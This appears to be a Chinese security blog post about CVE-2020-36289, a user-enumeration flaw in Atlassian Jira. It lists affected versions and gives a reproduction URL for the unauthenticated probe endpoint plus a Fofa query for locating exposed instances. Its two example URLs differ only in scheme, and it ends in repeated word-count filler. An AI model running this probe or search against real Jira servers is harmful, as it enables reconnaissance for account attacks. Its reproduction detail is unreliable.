CVE-2020-36289:Atlassian Jira User Enumeration)

影响范围

  •  Atlassian Jira < 8.5.13

  •  Atlassian Jira 8.6.0 ~8.13.5

  •  Atlassian Jira 8.14.0 ~8.15.1

漏洞类型

系统用户枚举

利用条件

影响范围应用

漏洞概述

Atlassian Jira的/QueryComponentRendererValue!Default.jspa端点可以用于进行用户枚举,如果Jira暴露在公网中,未授权用户就可以直接访问该端点爆破出潜在的用户名

漏洞复现

用户存在:

http://x.x.x.x:8080/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin

用户不存在:

https://x.x.x.x/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin

目标检索

Fofa:

\\\"Atlassian Jira\\\"

参考链接

https://jira.atlassian.com/browse/JRASERVER-71559

凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数

原创文章,作者:七芒星实验室,如若转载,请注明出处:https://www.sudun.com/ask/34146.html

(0)
七芒星实验室's avatar七芒星实验室
上一篇 2024年4月6日 下午7:08
下一篇 2024年4月6日 下午7:10

相关推荐

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注